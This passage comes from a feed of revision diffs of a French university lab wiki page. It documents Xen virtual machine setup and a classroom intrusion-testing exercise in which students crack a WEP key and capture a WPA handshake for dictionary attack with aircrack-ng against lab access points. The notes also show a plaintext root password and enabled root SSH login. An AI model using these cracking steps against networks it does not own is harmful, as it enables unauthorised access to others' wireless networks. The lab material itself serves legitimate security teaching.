===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56637</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56637"/>
				<updated>2021-11-29T16:24:57Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Connexion ssh */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56636</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56636"/>
				<updated>2021-11-29T16:22:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Machine Virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56125</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56125"/>
				<updated>2021-10-11T17:49:37Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests D'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56121</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56121"/>
				<updated>2021-10-11T17:47:22Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* 5.2 Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests D'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56118</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56118"/>
				<updated>2021-10-11T17:33:50Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* 5.2 Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests D'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
La première étape est de paramétrer notre carte réseau en mode moniteur. Le mode moniteur est un mode qui permet d'écouter chaque paquet qui se promène dans l'air : l'écoute de ces paquets nous permettra d'effectuer des injections ensuite. Pour ce faire, il nous faut tout d'abord le nom de notre interface :&lt;br /&gt;
 airmon-ng nous retourne notre interface réseau (WiPi) : wlx40a5ef0127d0&lt;br /&gt;
&lt;br /&gt;
Nous démarrons ensuite notre interface en mode moniteur sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlx40a5ef0127d0 3&lt;br /&gt;
&lt;br /&gt;
Afin de cracker la clef WEP d'un point d'accès, il est nécessaire pour nous de le choisir est de récupérer son BSSID :&lt;br /&gt;
 airodump-ng wlx40a5ef0127d0 nous permet d'écouter tous les paquets dans l'air&lt;br /&gt;
&lt;br /&gt;
Nous choisissons alors la cracotte12 et récupérons son BSSID : 04:DA:D2:9C:50:5B. Pour vérifier que nous sommes assez proche du point d'accès, on effectue un test d'injection qui doit nous retourner un pourcentage proche de 100% :&lt;br /&gt;
 aireplay-ng -9 -e cracotte12 -a 04:DA:D2:9C:50:5B wlx40a5ef0127d0&lt;br /&gt;
 &lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte12 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:5B : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Dans une console, on capture ensuite les VI générés par le point d'accès afin de les stocker dans un fichier ''output'' :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:5B -w output wlx40a5ef0127d0&lt;br /&gt;
 &lt;br /&gt;
 -c 3 : canal de communication du point d'accès&lt;br /&gt;
 -w output : préfixe de nom de fichier de sortie&lt;br /&gt;
&lt;br /&gt;
Une fois cette commande lancée, dans un autre terminal nous associons notre interface réseau avec le point d'accès. Il est nécessaire de passer par une fausse authentification pour cela :&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte12 -a 04:DA:D2:9C:50:5B -h 40:A5:EF:01:27:D0 wlx40a5ef0127d0&lt;br /&gt;
 &lt;br /&gt;
 -1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
 0 : délai entre les demandes d'authentifications&lt;br /&gt;
 -h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
A noter qu'il est nécessaire de laisser la capture des VI tourner assez longtemps pour avoir assez de contenu pour cracker la clef WEP.&lt;br /&gt;
&lt;br /&gt;
La clef WEP est ensuite décriptable grâce à la commande ''aircrack-ng'' et aux fichiers ''output'' :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:5B output*.cap&lt;br /&gt;
&lt;br /&gt;
Lorsque tout est correctement exécuté nous obtenons le résultat suivant :&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:FF:FF:FF:FF:FF:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56117</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56117"/>
				<updated>2021-10-11T17:30:34Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* 5.2 Cassage de clef WEP d’un point d’accès WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests D'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56116</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56116"/>
				<updated>2021-10-11T17:30:22Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Tests D'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests D'intrusions =&lt;br /&gt;
&lt;br /&gt;
=5.2 Cassage de clef WEP d’un point d’accès WiFi =&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56115</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56115"/>
				<updated>2021-10-11T17:30:10Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : Page créée avec « === Tests D'intrusions ===  =5.2 Cassage de clef WEP d’un point d’accès WiFi = »&lt;/p&gt;
&lt;hr /&gt;
